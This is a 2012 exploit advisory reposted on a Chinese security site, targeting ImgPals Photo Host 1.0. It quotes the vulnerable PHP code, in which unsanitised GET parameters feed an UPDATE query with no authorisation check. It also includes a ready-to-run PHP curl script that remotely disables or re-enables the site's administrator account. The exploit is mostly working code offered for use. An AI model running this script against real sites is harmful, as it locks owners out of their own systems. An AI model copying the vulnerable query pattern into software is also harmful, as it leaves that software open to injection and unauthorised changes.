首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 ImgPals Photo Host Version 1.0 Admin Account Disactivation 来源：corryl80@gmail.com 作者：CorryL 发布时间：2012-03-01   -=[--------------------ADVISORY-------------------]=- ImgPals Photo Host Version 1.0 STABLE Author: Corrado Liotta Aka CorryL [corryl80@gmail.com] -=[-----------------------------------------------]=- -=[+] Application: ImgPals Photo Host -=[+] Version: 1.0 STABLE -=[+] Vendor's URL: http://www.imgpals.com/forum/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Admin Account Disactivation -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 ...::[ Descriprion ]::.. I released the ImgPals Photo Host Version 1.0 STABLE Features Include:     * Easy Install     * Full README file included     * Full Control Panel to control your site     * User Side Features           o Multiple JQuery Uploads           o Create and Edit Photo Albums           o Make Albums Public or Private           o Describe Albums and Photos           o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos           o Add Friends           o Chat with Friends           o Update people with status wall posting           o Manage Profile           o Profile Avatar Uploads           o Private Messaging     * And much more, be sure to check out the Demo ...::[ Bug ]::.. A attaker can remotely disable the account from administratore not allowing the same to be able to access the site ...::[ Proof Of Concept ]::..  if ($_GET['a'] == 'app0'){                  $sqlapprove = mysql_query("UPDATE members SET approved = '0' WHERE id = '".$_GET['u']."'"); by sending the command approve.php? u = a = 1 & app0 a attaker can disable the Administrator account. ...::[ Exploit ]::.. #!/usr/bin/php -f <?php //Coded by Corrado Liotta For educational purpose only //use php exploit.php server app0 or app1 //use app0 for admin account off //use app1 for admin account on $target = $argv[1]; $power = $argv[2] $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Netmechanica NetDecision Dashb ·Novell Groupwise Address Book ·Netmechanica NetDecision Traff ·Microsoft Internet Explorer 8 ·Netmechanica NetDecision HTTP ·IBM Personal Communications I- ·ASUS Net4Switch ipswcom.dll Ac ·VLC Media Player RealText Subt ·Sysax <= 5.53 SSH Username BoF ·DJ Studio Pro 5.1 .pls Stack B ·Sysax Multi Server 5.53 SFTP P ·FlashFXP v4.1.8.1701 - Buffer   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved